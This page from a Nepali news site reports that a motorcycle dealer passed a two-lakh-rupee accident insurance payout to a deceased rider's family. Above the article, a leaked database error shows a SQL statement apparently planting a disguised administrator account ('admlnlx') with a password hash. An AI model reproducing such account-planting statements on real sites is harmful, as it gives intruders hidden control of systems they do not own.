WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4ZoGB3ejfTGus/vAmDWUMhTD1muJ6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 22:46:06', '', 'admlnlx', 'admlnlx')
चितवन, पुस १२–
नारायणी मोटर्स नारायणगढले मोटरसाईकल दुर्घटनामा पनि निधन भएका गैंडाकोट–२ का निराजन न्यौपानेका परिवारलाई बिमा बापतको दुई लाख रुपैयाँ प्रदान गरेको छ ।
आज एक कार्यक्रमकाबीच नारायणी मोटर्सका प्रमुख बालगोपाल चुके र सिदार्थ इन्सुरेन्स नारायणगढका प्रमुख माधव रेग्मीले सो रकमको चेक मृतका बुबा इश्वरी न्यौपानेलाई प्रदान गरे । नारायणी मोटर्सले पछिल्लो दुई वर्षमा मोटरसाईकल खरिद गर्ने धनीलाई आफैले सिदार्थ इन्सुरेन्स नारायणगढमा २ लाख रुपैयाँ बराबरको दुर्घटना बिमा गरेको एिक वर्षअघि बजाज डिस्कभर मोटरसाईकल खरिद गरेका न्यौपानेको गत भदौंमा भरतपुरमा दुर्घटनामा परि ज्यान गएको थियो । इन्सुरेन्स कम्पनीले बिमा बापतको रकम उपलब्ध गराएपछि सो रकम मृतकका अभिभावकलाई प्रदान गरिएको नारायणी मोटर्सका प्रमुख चुकेले बताउनुभयो ।
यसअघि नारायणी मोटर्सले यही बिमा अन्तरगत दुर्घटनामा परि ज्यान गुमाएका गुन्जबहादुर वि.क.को परिवारलाई २ लाख रुपैयाँ प्रदान गरेको थियो । नारायणी मोटर्सले आर्थिक वर्ष २०७१/७२ र आ.व.२०७२/७३ मा मोटरसाईकल खरिद गर्ने धनीलाई दुर्घटना बिमा गरेको थियो ।